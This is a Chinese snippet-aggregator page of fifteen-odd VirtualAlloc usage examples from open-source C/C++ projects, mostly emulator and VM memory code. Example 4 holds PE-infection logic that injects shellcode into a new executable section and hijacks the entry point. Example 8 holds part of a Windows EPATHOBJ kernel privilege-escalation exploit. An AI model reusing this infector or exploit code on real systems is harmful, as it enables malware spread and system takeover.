本文整理汇总了C++中VirtualAlloc函数的典型用法代码示例。如果您正苦于以下问题:C++ VirtualAlloc函数的具体用法?C++ VirtualAlloc怎么用?C++ VirtualAlloc使用的例子?那么, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了VirtualAlloc函数的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的C++代码示例。
示例1: uae_log
static void *uae_vm_alloc_with_flags(uae_u32 size, int flags, int protect)
{
void *address = NULL;
uae_log("VM: Allocate 0x%-8x bytes [%d] (%s)\n",
size, flags, protect_description(protect));
#ifdef _WIN32
int va_type = MEM_COMMIT | MEM_RESERVE;
if (flags & UAE_VM_WRITE_WATCH) {
va_type |= MEM_WRITE_WATCH;
}
int va_protect = protect_to_native(protect);
#ifdef CPU_64_BIT
if (flags & UAE_VM_32BIT) {
/* Stupid algorithm to find available space, but should
* work well enough when there is not a lot of allocations. */
uae_u8 *p = (uae_u8 *) 0x50000000;
while (address == NULL) {
if (p >= (void*) 0x60000000) {
break;
}
address = VirtualAlloc(p, size, va_type, va_protect);
p += uae_vm_page_size();
}
}
#endif
if (!address) {
address = VirtualAlloc(NULL, size, va_type, va_protect);
}
#else
//size = size < uae_vm_page_size() ? uae_vm_page_size() : size;
int mmap_flags = MAP_PRIVATE | MAP_ANON;
int mmap_prot = protect_to_native(protect);
#ifdef CPU_64_BIT
if (flags & UAE_VM_32BIT) {
#ifdef HAVE_MAP_32BIT
mmap_flags |= MAP_32BIT;
#else
/* Stupid algorithm to find available space, but should
* work well enough when there is not a lot of allocations. */
uae_u8 *p = natmem_offset - 0x10000000;
uae_u8 *p_end = p + 0x10000000;
while (address == NULL) {
if (p >= p_end) {
break;
}
printf("%p\n", p);
address = mmap(p, size, mmap_prot, mmap_flags, -1, 0);
/* FIXME: check 32-bit result */
if (address == MAP_FAILED) {
address = NULL;
}
p += uae_vm_page_size();
}
#endif
}
#endif
if (address == NULL) {
address = mmap(0, size, mmap_prot, mmap_flags, -1, 0);
if (address == MAP_FAILED) {
address = NULL;
}
}
#endif
if (address == NULL) {
uae_log("VM: uae_vm_alloc(%u, %d, %d) mmap failed (%d)\n",
size, flags, protect, errno);
return NULL;
}
#ifdef TRACK_ALLOCATIONS
add_allocation(address, size);
#endif
uae_log("VM: %p\n", address);
return address;
}示例2: os_commit
void os_commit (void* ptr, size_t bytes) {
VirtualAlloc(ptr,bytes,MEM_COMMIT,PAGE_READWRITE);
}示例3: defined
//
// Setting access specifications for next test.
// Note that Iometer will call Set_Access before testing starts to ensure that
// Dynamo can run the spec with the largest transfer request.
//
BOOL Manager::Set_Access( int target, const Test_Spec *spec )
{
int g; // loop control variable
// Recursively assign all workers the same access specification.
if ( target == ALL_WORKERS )
{
cout << "All workers running Access Spec: " << spec->name << endl;
for ( g = 0; g < grunt_count; g++ )
{
if ( !Set_Access( g, spec ) )
return FALSE;
}
return TRUE;
}
cout << "Worker " << target << " running Access Spec: " << spec->name << endl;
// If the grunt could not set the access spec properly, return.
// The grunt may not have been able to grow its data buffer.
if ( !grunts[target]->Set_Access( spec ) )
return FALSE;
// If the grunt is not using the manager's data buffer or the manager's
// buffer is already large enough, just return.
if ( grunts[target]->data_size ||
data_size >= grunts[target]->access_spec.max_transfer )
{
return TRUE;
}
// Grow the manager's data buffer and update all grunts using it.
#if _DEBUG
cout << "Growing manager data buffer from " << data_size << " to "
<< grunts[target]->access_spec.max_transfer << endl << flush;
#endif
// Align all data transfers on a page boundary. This will work for all disks
// with sector sizes that divide evenly into the page size - which is always
// the case.
#if defined (_WIN32) || defined (_WIN64)
VirtualFree( data, 0, MEM_RELEASE );
if ( !(data = VirtualAlloc( NULL, grunts[target]->access_spec.max_transfer,
MEM_COMMIT, PAGE_READWRITE )) )
#else // UNIX
free(data);
errno = 0;
if ( !(data = valloc(grunts[target]->access_spec.max_transfer) ))
#endif
{
// Could not allocate a larger buffer. Signal failure.
cout << "*** Manager could not allocate data buffer for I/O transfers."
<< endl << flush;
data_size = 0;
return FALSE;
}
data_size = grunts[target]->access_spec.max_transfer;
// Update all grunts using the manager's data buffer.
for ( g = 0; g < grunt_count; g++ )
{
if ( !grunts[g]->data_size )
grunts[g]->data = data;
}
return TRUE;
}示例4: AddSection
void AddSection(void* lpModule, unsigned long ulModule, unsigned long ulRawSize)
{
PIMAGE_DOS_HEADER lpDos = (PIMAGE_DOS_HEADER)(lpModule);
PIMAGE_NT_HEADERS lpNt = (PIMAGE_NT_HEADERS)((unsigned long)lpDos + lpDos->e_lfanew);
if (lpNt->Signature == IMAGE_NT_SIGNATURE)
{
unsigned long ulNewImageSize = ulModule + CalculateBoundary(lpNt->OptionalHeader.FileAlignment, ulRawSize);
if (ulNewImageSize)
{
void * lpNewBase = VirtualAlloc(NULL,ulNewImageSize,MEM_COMMIT|MEM_RESERVE,0x40);
if (lpNewBase)
{
PIMAGE_SECTION_HEADER lpLastSection = (PIMAGE_SECTION_HEADER)((unsigned long)lpNewBase + lpDos->e_lfanew + sizeof(IMAGE_NT_HEADERS) + ((lpNt->FileHeader.NumberOfSections-1)*40));
PIMAGE_SECTION_HEADER lpNewSection = (PIMAGE_SECTION_HEADER)((unsigned long)lpLastSection + sizeof(IMAGE_SECTION_HEADER));
unsigned long ulEOF = 0;
unsigned long ulCheckSum = 0;
unsigned long ulOldCheckSum = 0;
unsigned long ulEntryPoint = 0;
unsigned long ulOffset = 0;
lpNt = (PIMAGE_NT_HEADERS)((unsigned long)lpNewBase+ lpDos->e_lfanew);
RtlSecureZeroMemory(lpNewBase,ulNewImageSize);
m_memcpy(lpNewBase,lpModule,ulModule);
m_memcpy(&lpNewSection->Name, ".stdio", strlen(".stdio"));
lpNewSection->SizeOfRawData = CalculateBoundary(lpNt->OptionalHeader.FileAlignment,ulRawSize);
lpNewSection->PointerToRawData = CalculateBoundary(lpNt->OptionalHeader.FileAlignment, lpLastSection->PointerToRawData + lpLastSection->SizeOfRawData);
lpNewSection->VirtualAddress = CalculateBoundary(lpNt->OptionalHeader.SectionAlignment, lpLastSection->VirtualAddress + lpLastSection->Misc.VirtualSize);
lpNewSection->Characteristics = (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ);
lpNewSection->Misc.VirtualSize = ulRawSize;
lpNt->FileHeader.NumberOfSections++;
lpNt->OptionalHeader.SizeOfImage = CalculateBoundary(lpNt->OptionalHeader.SectionAlignment, lpNewSection->VirtualAddress + ulRawSize);
ulEntryPoint = lpNt->OptionalHeader.AddressOfEntryPoint;
m_memcpy((void*)((unsigned long)lpNewBase + lpNewSection->PointerToRawData), ucCallCode, sizeof(ucCallCode));
ulOffset = ulEntryPoint - (lpNewSection->VirtualAddress + sizeof(ucCallCode)) - 5;
m_memcpy(&ucJMP[1],&ulOffset, sizeof(unsigned long));
m_memcpy((void*)((unsigned long)lpNewBase + lpNewSection->PointerToRawData + sizeof(ucCallCode)), ucJMP,sizeof(ucJMP));
m_memcpy((void*)((unsigned long)lpNewBase + lpNewSection->PointerToRawData + sizeof(ucCallCode) + sizeof(ucJMP)), ucShellCode, sizeof(ucShellCode));
if (ulEOF = GetEOFSize(lpLastSection, ulModule))
{
m_memcpy((void*)((unsigned long)lpNewBase + lpNewSection->PointerToRawData + lpNewSection->SizeOfRawData), (void*)((unsigned long)lpModule + (lpLastSection->PointerToRawData + lpLastSection->SizeOfRawData)), ulEOF);
}
lpNt->OptionalHeader.AddressOfEntryPoint = (lpNewSection->VirtualAddress);
if (CheckSumMappedFile(lpNewBase,ulNewImageSize, &ulOldCheckSum, &ulCheckSum))
{
lpNt->OptionalHeader.CheckSum = ulCheckSum;
}
if (WriteFileBuffer("NTTITON.exe",lpNewBase,ulNewImageSize))
{
printf("Had to add section.... no codecaves were available FUUUUCK\n");
}
VirtualFree(lpNewBase,ulNewImageSize,MEM_RELEASE);
}
}
}
}示例5: LockMut
bool VirtualMemoryManager::PageFault(void *ptr)
{
if(!inited)
return false;
LockMut(vmemMutex);
// check that the address is within the virtual address bounds
if((DWORD)ptr < baseAddress || (DWORD)ptr >= baseAddress + (totalPages * pageSize))
{
if(LOG)
{
LOG->Trace("Vmem error: Page fault outside virtual memory bounds");
LOG->Trace("Address: %u, bounds: %u to %u", (DWORD)ptr, baseAddress, baseAddress + (totalPages * pageSize));
}
return false;
}
// find the page segment that the fault occurred
unsigned long offset = (DWORD)ptr - baseAddress;
unsigned long pageIndex = offset / pageSize;
unsigned long startPage = pages[pageIndex].headPage;
if(startPage == -1)
{
if(LOG)
LOG->Trace("VMem error: Trying to access memory that wasn't allocated");
// trying to access memory that wasn't allocated
return false;
}
if(pages[startPage].committed)
{
if(LOG && logging)
LOG->Trace("Pages appear to be committed already. Doing nothing...");
return true;
}
pageLRU = (startPage + pages[startPage].sizeInPages) % totalPages;
if(LOG && logging)
LOG->Trace("Reallocating pages %u to %u", startPage, startPage + pages[startPage].sizeInPages - 1);
DWORD ret = (DWORD)VirtualAlloc((LPVOID)pages[startPage].startAddress, pages[startPage].sizeInBytes, MEM_COMMIT, PAGE_READWRITE);
while(ret == NULL)
{
bool swappedOut = DecommitLRU();
if(!swappedOut)
{
if(LOG)
LOG->Trace("VMem error: no pages left to swap out while reallocating");
return false;
}
ret = (DWORD)VirtualAlloc((LPVOID)pages[startPage].startAddress, pages[startPage].sizeInBytes, MEM_COMMIT, PAGE_READWRITE);
}
for(unsigned long i = startPage; i < startPage + pages[startPage].sizeInPages; i++)
{
pages[i].committed = true;
pages[i].pageFaults++;
}
DWORD numRead;
SetFilePointer(vmemFile, pages[startPage].startAddress - baseAddress, 0, FILE_BEGIN);
ReadFile(vmemFile, (void *)pages[startPage].startAddress, pages[startPage].sizeInBytes, &numRead, NULL);
return true;
}示例6: Memory_TryBase
static bool Memory_TryBase(u32 flags) {
// OK, we know where to find free space. Now grab it!
// We just mimic the popular BAT setup.
#if defined(_XBOX)
void *ptr;
#elif !defined(__SYMBIAN32__)
size_t position = 0;
size_t last_position = 0;
#endif
// Zero all the pointers to be sure.
for (int i = 0; i < num_views; i++)
{
if (views[i].out_ptr_low)
*views[i].out_ptr_low = 0;
if (views[i].out_ptr)
*views[i].out_ptr = 0;
}
int i;
for (i = 0; i < num_views; i++)
{
const MemoryView &view = views[i];
if (view.size == 0)
continue;
SKIP(flags, view.flags);
#ifdef __SYMBIAN32__
if (!CanIgnoreView(view)) {
*(view.out_ptr_low) = (u8*)(base + view.virtual_address);
memmap->Commit(view.virtual_address & MEMVIEW32_MASK, view.size);
}
*(view.out_ptr) = (u8*)base + (view.virtual_address & MEMVIEW32_MASK);
#elif defined(_XBOX)
if (!CanIgnoreView(view)) {
*(view.out_ptr_low) = (u8*)(base + view.virtual_address);
ptr = VirtualAlloc(base + (view.virtual_address & MEMVIEW32_MASK), view.size, MEM_COMMIT, PAGE_READWRITE);
}
*(view.out_ptr) = (u8*)base + (view.virtual_address & MEMVIEW32_MASK);
#else
if (view.flags & MV_MIRROR_PREVIOUS) {
position = last_position;
} else {
*(view.out_ptr_low) = (u8*)g_arena.CreateView(position, view.size);
if (!*view.out_ptr_low)
goto bail;
}
#ifdef _M_X64
*view.out_ptr = (u8*)g_arena.CreateView(
position, view.size, base + view.virtual_address);
#else
if (CanIgnoreView(view)) {
// No need to create multiple identical views.
*view.out_ptr = *views[i - 1].out_ptr;
} else {
*view.out_ptr = (u8*)g_arena.CreateView(
position, view.size, base + (view.virtual_address & MEMVIEW32_MASK));
if (!*view.out_ptr)
goto bail;
}
#endif
last_position = position;
position += g_arena.roundup(view.size);
#endif
}
return true;
#if !defined(_XBOX) && !defined(__SYMBIAN32__)
bail:
// Argh! ERROR! Free what we grabbed so far so we can try again.
for (int j = 0; j <= i; j++)
{
if (views[i].size == 0)
continue;
SKIP(flags, views[i].flags);
if (views[j].out_ptr_low && *views[j].out_ptr_low)
{
g_arena.ReleaseView(*views[j].out_ptr_low, views[j].size);
*views[j].out_ptr_low = NULL;
}
if (*views[j].out_ptr)
{
if (!CanIgnoreView(views[j])) {
g_arena.ReleaseView(*views[j].out_ptr, views[j].size);
}
*views[j].out_ptr = NULL;
}
}
return false;
#endif
}示例7: Memory_Init
bool Memory_Init()
{
gRamSize = kMaximumMemSize;
#ifdef DAED_USE_VIRTUAL_ALLOC
gMemBase = VirtualAlloc(0, 512*1024*1024, MEM_RESERVE, PAGE_READWRITE);
if (gMemBase == NULL)
{
return false;
}
uintptr_t base = reinterpret_cast<uintptr_t>(gMemBase);
g_pMemoryBuffers[ MEM_RD_RAM ] = (u8*)VirtualAlloc( (void*)(base+0x00000000), 8*1024*1024,MEM_COMMIT, PAGE_READWRITE );
g_pMemoryBuffers[ MEM_SP_MEM ] = (u8*)VirtualAlloc( (void*)(base+0x04000000), 0x2000, MEM_COMMIT, PAGE_READWRITE );
g_pMemoryBuffers[ MEM_RD_REG0 ] = (u8*)VirtualAlloc( (void*)(base+0x03F00000), 0x30, MEM_COMMIT, PAGE_READWRITE );
g_pMemoryBuffers[ MEM_SP_REG ] = (u8*)VirtualAlloc( (void*)(base+0x04040000), 0x20, MEM_COMMIT, PAGE_READWRITE );
g_pMemoryBuffers[ MEM_SP_PC_REG ] = (u8*)VirtualAlloc( (void*)(base+0x04080000), 0x08, MEM_COMMIT, PAGE_READWRITE );
g_pMemoryBuffers[ MEM_DPC_REG ] = (u8*)VirtualAlloc( (void*)(base+0x04100000), 0x20, MEM_COMMIT, PAGE_READWRITE );
g_pMemoryBuffers[ MEM_MI_REG ] = (u8*)VirtualAlloc( (void*)(base+0x04300000), 0x10, MEM_COMMIT, PAGE_READWRITE );
g_pMemoryBuffers[ MEM_VI_REG ] = (u8*)VirtualAlloc( (void*)(base+0x04400000), 0x38, MEM_COMMIT, PAGE_READWRITE );
g_pMemoryBuffers[ MEM_AI_REG ] = (u8*)VirtualAlloc( (void*)(base+0x04500000), 0x18, MEM_COMMIT, PAGE_READWRITE );
g_pMemoryBuffers[ MEM_PI_REG ] = (u8*)VirtualAlloc( (void*)(base+0x04600000), 0x34, MEM_COMMIT, PAGE_READWRITE );
g_pMemoryBuffers[ MEM_RI_REG ] = (u8*)VirtualAlloc( (void*)(base+0x04700000), 0x20, MEM_COMMIT, PAGE_READWRITE );
g_pMemoryBuffers[ MEM_SI_REG ] = (u8*)VirtualAlloc( (void*)(base+0x04800000), 0x1C, MEM_COMMIT, PAGE_READWRITE );
//cartDom2 = (u8*)VirtualAlloc( (void*)(base+0x05000000), 0x10000, MEM_COMMIT, PAGE_READWRITE );
//cartDom1 = (u8*)VirtualAlloc( (void*)(base+0x06000000), 0x10000, MEM_COMMIT, PAGE_READWRITE );
g_pMemoryBuffers[ MEM_SAVE ] = (u8*)VirtualAlloc( (void*)(base+0x08000000), 0x20000, MEM_COMMIT, PAGE_READWRITE );
//g_pMemoryBuffers[MEM_CARTROM ] = (u8*)VirtualAlloc( (void*)(base+0x10000000), cart_size, MEM_COMMIT, PAGE_READWRITE);
g_pMemoryBuffers[ MEM_PIF_RAM ] = (u8*)VirtualAlloc( (void*)(base+0x1FC00000), 0x40, MEM_COMMIT, PAGE_READWRITE );
//cartDom4 = (u8*)VirtualAlloc( (void*)(base+0x1FD00000), 0x10000, MEM_COMMIT, PAGE_READWRITE );
g_pMemoryBuffers[ MEM_MEMPACK ] = (u8*)VirtualAlloc( NULL, 0x20000, MEM_COMMIT, PAGE_READWRITE );
g_pMemoryBuffers[ MEM_UNUSED ] = new u8[ MemoryRegionSizes[MEM_UNUSED] ];
#else
//u32 count = 0;
for (u32 m = 0; m < NUM_MEM_BUFFERS; m++)
{
u32 region_size = MemoryRegionSizes[m];
// Skip zero sized areas. An example of this is the cart rom
if (region_size > 0)
{
//count+=region_size;
g_pMemoryBuffers[m] = new u8[region_size];
//g_pMemoryBuffers[m] = Memory_AllocRegion(region_size);
if (g_pMemoryBuffers[m] == NULL)
{
return false;
}
// Necessary?
memset(g_pMemoryBuffers[m], 0, region_size);
/*if (region_size < 0x100) // dirty, check if this is a I/O range
{
g_pMemoryBuffers[m] = MAKE_UNCACHED_PTR(g_pMemoryBuffers[m]);
}*/
}
}
//printf("%d bytes used of memory\n",count);
#endif
g_pu8RamBase_8000 = ((u8*)g_pMemoryBuffers[MEM_RD_RAM]) - 0x80000000;
//g_pu8RamBase_A000 = ((u8*)g_pMemoryBuffers[MEM_RD_RAM]) - 0xa0000000;
//g_pu8RamBase_A000 = ((u8*)MAKE_UNCACHED_PTR(g_pMemoryBuffers[MEM_RD_RAM])) - 0xa0000000;
g_RomWritten = false;
Memory_InitTables();
return true;
}示例8: main
int main(int argc, char **argv)
{
HANDLE Thread;
HDC Device;
ULONG Size;
ULONG PointNum;
HMODULE KernelHandle;
PULONG DispatchRedirect;
PULONG Interval;
ULONG SavedInterval;
RTL_PROCESS_MODULES ModuleInfo;
LogMessage(L_INFO, "\r--------------------------------------------------\n"
"\rWindows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit\n"
"\r------------------- taviso () cmpxchg8b com, programmeboy () gmail com ---\n"
"\n");
NtQueryIntervalProfile = GetProcAddress(GetModuleHandle("ntdll"), "NtQueryIntervalProfile");
NtQuerySystemInformation = GetProcAddress(GetModuleHandle("ntdll"), "NtQuerySystemInformation");
Mutex = CreateMutex(NULL, FALSE, NULL);
DispatchRedirect = (PVOID) HalDispatchRedirect;
Interval = (PULONG) ShellCode;
SavedInterval = Interval[0];
TargetPid = GetCurrentProcessId();
LogMessage(L_INFO, "NtQueryIntervalProfile () %p", NtQueryIntervalProfile);
LogMessage(L_INFO, "NtQuerySystemInformation () %p", NtQuerySystemInformation);
// Lookup the address of system modules.
NtQuerySystemInformation(SystemModuleInformation,
&ModuleInfo,
sizeof ModuleInfo,
NULL);
LogMessage(L_DEBUG, "NtQuerySystemInformation() => %s () %p",
ModuleInfo.Modules[0].FullPathName,
ModuleInfo.Modules[0].ImageBase);
// Lookup some system routines we require.
KernelHandle = LoadLibrary(ModuleInfo.Modules[0].FullPathName + ModuleInfo.Modules[0].OffsetToFileName);
HalDispatchTable = (ULONG) GetProcAddress(KernelHandle, "HalDispatchTable") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
PsInitialSystemProcess = (ULONG) GetProcAddress(KernelHandle, "PsInitialSystemProcess") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
PsReferencePrimaryToken = (ULONG) GetProcAddress(KernelHandle, "PsReferencePrimaryToken") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
PsLookupProcessByProcessId = (ULONG) GetProcAddress(KernelHandle, "PsLookupProcessByProcessId") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
// Search for a ret instruction to install in the damaged HalDispatchTable.
HalQuerySystemInformation = (ULONG) memchr(KernelHandle, 0xC3, ModuleInfo.Modules[0].ImageSize)
- (ULONG) KernelHandle
+ (ULONG) ModuleInfo.Modules[0].ImageBase;
LogMessage(L_INFO, "Discovered a ret instruction at %p", HalQuerySystemInformation);
// Create our PATHRECORD in user space we will get added to the EPATHOBJ
// pathrecord chain.
PathRecord = VirtualAlloc(NULL,
sizeof *PathRecord,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
LogMessage(L_INFO, "Allocated userspace PATHRECORD () %p", PathRecord);
// You need the PD_BEZIERS flag to enter EPATHOBJ::pprFlattenRec() from
// EPATHOBJ::bFlatten(). We don't set it so that we can trigger an infinite
// loop in EPATHOBJ::bFlatten().
PathRecord->flags = 0;
PathRecord->next = PathRecord;
PathRecord->prev = (PPATHRECORD)(0x42424242);
LogMessage(L_INFO, " ->next @ %p", PathRecord->next);
LogMessage(L_INFO, " ->prev @ %p", PathRecord->prev);
LogMessage(L_INFO, " ->flags @ %u", PathRecord->flags);
// Now we need to create a PATHRECORD at an address that is also a valid
// x86 instruction, because the pointer will be interpreted as a function.
// I've created a list of candidates in DispatchRedirect.
LogMessage(L_INFO, "Searching for an available stub address...");
// I need to map at least two pages to guarantee the whole structure is
// available.
while (!VirtualAlloc(*DispatchRedirect & ~(PAGE_SIZE - 1),
PAGE_SIZE * 2,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE)) {
LogMessage(L_WARN, "\tVirtualAlloc(%#x) => %#x",
*DispatchRedirect & ~(PAGE_SIZE - 1),
GetLastError());
// This page is not available, try the next candidate.
if (!*++DispatchRedirect) {
LogMessage(L_ERROR, "No redirect candidates left, sorry!");
return 1;
}
}
LogMessage(L_INFO, "Success, ExploitRecordExit () %#0x", *DispatchRedirect);
// This PATHRECORD must terminate the list and recover.
ExploitRecordExit = (PPATHRECORD) *DispatchRedirect;
ExploitRecordExit->next = NULL;
//.........这里部分代码省略.........
示例9: CVMmemMap
/* Purpose: Commits a range of memory which was previously reserved using
CVMmemMap(). The memory range may be a subset of the range
returned by CVMmemMap(). The range to commit is specified by
addr as the starting address of the range, and requestedSize as the
size of the range in units of bytes.
Returns: The starting address of the committed range is returned.
The actual size of the committed range is set in *committedSize
in units of bytes.
Else, if failed to commit, NULL is returned and *committedSize is
set to 0.
Note: memory sizes must be in increments of the page size as returned
by CVMmemPageSize() in units of bytes.
Committed memory must be uncommitted using CVMmemDecommit() before it
is unmmapped with CVMmemUnmap(). If this order is not adhered to,
then the state of the committed memory will be undefined.
*/
void *CVMmemCommit(void *requestedAddr, size_t requestedSize,
size_t *committedSize)
{
void *committedAddr = NULL;
MEMORY_BASIC_INFORMATION mb;
CVMassert(requestedSize == roundUpToGrain(requestedSize));
CVMassert(requestedAddr ==
(void *)roundDownToGrain((CVMAddr)requestedAddr));
if (requestedSize != 0) {
committedAddr = VirtualAlloc(requestedAddr, requestedSize, MEM_COMMIT,
PAGE_READWRITE);
#ifdef WINCE
if (committedAddr == NULL && ((DWORD)requestedAddr + requestedSize) >=
ROUND_UP_32MB(requestedAddr)) {
/* hitting/crossing 32MB boundary, need to break up the commit */
size_t origSize = requestedSize;
void *newAddr = requestedAddr;
size_t pageSize = CVMmemPageSize();
while(((DWORD)newAddr + origSize) >= ROUND_UP_32MB(newAddr)) {
size_t newSize = ROUND_UP_32MB(newAddr) - (DWORD)newAddr;
if (newSize >= pageSize * 2) {
/* Sometimes, for whatever reason, if you
* allocate right up to the 32MB boundary it returns
* INVALID PARAMETER error. So, back off a page
*/
newSize -= pageSize;
}
committedAddr = VirtualAlloc(newAddr, newSize, MEM_COMMIT,
PAGE_READWRITE);
if (committedAddr == NULL) {
break;
}
newAddr = (void*)((DWORD)newAddr + newSize);
origSize -= newSize;
}
#if _WIN32_WCE < 600
while(committedAddr != NULL && origSize > 0) {
/* Some residual pages to commit */
/* WinCE < 6.0 fails on commits that are too big, where too big
* is some unknown value I can't seem to pin down. So just do
* it a page at a time.
*/
committedAddr = VirtualAlloc(newAddr, pageSize, MEM_COMMIT,
PAGE_READWRITE);
origSize -= pageSize;
newAddr = (void *)((DWORD)newAddr + pageSize);
}
#else
if (committedAddr != NULL) {
committedAddr = VirtualAlloc(newAddr, origSize, MEM_COMMIT,
PAGE_READWRITE);
}
#endif
if (committedAddr != NULL) {
committedAddr = requestedAddr;
}
}
#endif
}
*committedSize = (committedAddr != NULL) ?
(CVMassert(committedAddr == requestedAddr), requestedSize) : 0;
#ifdef WINCE
if (committedAddr == NULL) {
/* Must have had an error committing, attempt to decommit anything we
* committed
*/
size_t decommittedSize;
CVMmemDecommit(requestedAddr, requestedSize, &decommittedSize);
}
#endif
#ifdef DEBUG_MMAP
if (committedAddr != NULL) {
CVMconsolePrintf(
"CVMmemCommit: 0x%x bytes at 0x%x (request: 0x%x bytes at 0x%x)\n",
*committedSize, committedAddr, requestedSize, requestedAddr);
} else {
CVMconsolePrintf(
"CVMmemCommit failed: Error %d, (request: 0x%x bytes at 0x%x)\n",
GetLastError(), requestedSize, requestedAddr);
//.........这里部分代码省略.........
示例10: CVMmemalignAlloc
extern void*
CVMmemalignAlloc(size_t alignment, size_t size)
{
CVMassert(alignment == WIN32_VIRTUAL_ALLOC_ALIGNMENT);
return VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE);
}示例11: WndProc
//
// FUNCTION: WndProc(HWND, unsigned, WORD, LONG)
//
// PURPOSE: Processes messages for the main window.
//
// WM_COMMAND - process the application menu
// WM_PAINT - Paint the main window
// WM_DESTROY - post a quit message and return
//
//
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
int wmId, wmEvent;
switch (message)
{
HANDLE_MSG(hWnd, WM_PAINT, OnPaint);
case WM_COMMAND:
wmId = LOWORD(wParam);
wmEvent = HIWORD(wParam);
// Parse the menu selections:
switch (wmId)
{
case IDM_OPEN:
{
TCHAR szPathName[_MAX_PATH]; // Maximum file name size is 260 characters.
OPENFILENAME ofn;
BOOL bReturn;
DWORD dw;
int cbSize = sizeof(OPENFILENAME);
szPathName[0] = 0;
memset(&ofn, 0, cbSize);
ofn.lStructSize = cbSize;
ofn.hwndOwner = hWnd;
ofn.lpstrFilter = TEXT("Text files\0*.txt\0All files\0*.*\0");
ofn.nFilterIndex = 1;
ofn.lpstrFile = szPathName;
ofn.nMaxFile = _MAX_PATH;
ofn.Flags = OFN_FILEMUSTEXIST | OFN_HIDEREADONLY;
ofn.lpstrDefExt = TEXT("txt");
bReturn = GetOpenFileName(&ofn);
if(bReturn)
{
MessageBox(hWnd,szPathName,_T("File Selected"),MB_OK);
HANDLE hFile = CreateFile(szPathName,
GENERIC_READ,
FILE_SHARE_READ,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (hFile == (HANDLE)0xffffffff)
{
MessageBox(hWnd, TEXT("Call to CreateFile failed"), achAppName, MB_OK);
return 0L;
}
// Free memory if we've allocated any before.
if (pData)
{
VirtualFree(pData, 0, MEM_RELEASE);
pData = NULL;
}
// Determine file size first.
DWORD dwFileSize = GetFileSize(hFile, NULL);
pData = (TCHAR *)VirtualAlloc(NULL, dwFileSize, MEM_COMMIT, PAGE_READWRITE);
DWORD dwRead;
ReadFile(hFile, pData, dwFileSize, &dwRead, NULL);
CloseHandle(hFile);
InvalidateRect(hWnd, NULL, TRUE);
return 0L;
}
else
{
dw = CommDlgExtendedError();
if(dw==0)
MessageBox(hWnd,_T("User clicked cancel"),_T("Open"),MB_OK);
else
MessageBox(hWnd,_T("Error"),_T("Open"),MB_OK);
}
}
break;
case IDM_HELP_ABOUT:
DialogBox(hInst, (LPCTSTR)IDD_ABOUTBOX, hWnd, (DLGPROC)About);
break;
case IDM_FILE_EXIT:
DestroyWindow(hWnd);
break;
default:
return DefWindowProc(hWnd, message, wParam, lParam);
}
break;
//.........这里部分代码省略.........
示例12: wmain
int
wmain(void) {
uint64 PerfCountFrequency = SDL_GetPerformanceFrequency();
SDL_Event Event;
SDL_Window *Window;
SDL_Renderer *Renderer;
if(SDL_Init(SDL_INIT_VIDEO | SDL_INIT_GAMECONTROLLER | SDL_INIT_HAPTIC) != 0) {
char *Error = "Could not initialize SDL: %s\n";
printf(Error, SDL_GetError());
return -1;
}
atexit(SDL_Quit);
int WindowWidth = 1300;
int WindowHeight = 870;
int BytesPerPixel = 4;
Window = SDL_CreateWindow("Echelon",
30, 30,
WindowWidth, WindowHeight,
SDL_WINDOW_RESIZABLE);
if(Window) {
Renderer = SDL_CreateRenderer(Window, -1, 0);
if(Renderer) {
GlobalRunning = true;
window_dimensions Dimensions = SDLGetWindowDimensions(Window);
SDLCreateNewTexture(&GlobalBuffer,
Renderer,
Dimensions.Width, Dimensions.Height,
BytesPerPixel);
uint64 LastCounter = SDL_GetPerformanceCounter();
uint64 LastCycleCount = __rdtsc();
real64 DebugTimer = 0;
real64 FPSTimer = 0;
real64 UpdateTimer = 0;
uint32 FPS = 0;
uint32 UPS = 0;
keyboard_input KeyboardInput = {};
gamepad_input GamePadInput = {};
game_code Game = LoadGameCode();
game_memory GameMemory = {0};
GameMemory.IsInitialized = false;
GameMemory.PlayRumble = SDLPlayRumble;
GameMemory.WindowDimensions = SDLGetWindowDimensions(Window);
GameMemory.PermanentStorageSize = Gigabytes(4);
GameMemory.PermanentStorage = VirtualAlloc(0,
GameMemory.PermanentStorageSize,
MEM_COMMIT, PAGE_READWRITE);
//Assert((GameMemory.PermanentStorageSize));
GameMemory.TransientStorageSize = Megabytes(4);
GameMemory.TransientStorage = VirtualAlloc(0,
GameMemory.TransientStorageSize,
MEM_COMMIT, PAGE_READWRITE);
//Assert((GameMemory.TransientStorageSize));
Game.GameInit(&GameMemory);
while(GlobalRunning) {
// NOTE(Redab): This needs to while loop because we need
// to handle events as long as they are available.
while(SDL_PollEvent(&Event)) {
SDLHandleEvent(&Event, &Dimensions);
SDLHandleUserInput(&Event, &Game, &GameMemory, &KeyboardInput, &GamePadInput);
}
uint64 EndCycleCount = __rdtsc();
uint64 EndCounter = SDL_GetPerformanceCounter();
uint64 CounterElapsed = EndCounter - LastCounter;
uint64 CyclesElapsed = EndCycleCount - LastCycleCount;
// NOTE(Redab): CounterElapsed Contains the number of
// clock cycles since last check. So we need to divide
// this by the number of cycles per second which we
// have in PerCountFrequency. Multiplied by 1000 to
// get milliseconds.
real64 SecondsPerFrame = ((real64)CounterElapsed / (real64)PerfCountFrequency);
real64 MSPerFrame = SecondsPerFrame * 1000.0f;
real64 KCPF = ((real64)CyclesElapsed / (1000.0f));
FPSTimer += MSPerFrame;
UpdateTimer += MSPerFrame;
DebugTimer += MSPerFrame;
if(UpdateTimer >= (1000.0f / 60.0f)) {
GameMemory.WindowDimensions = Dimensions;
//.........这里部分代码省略.........
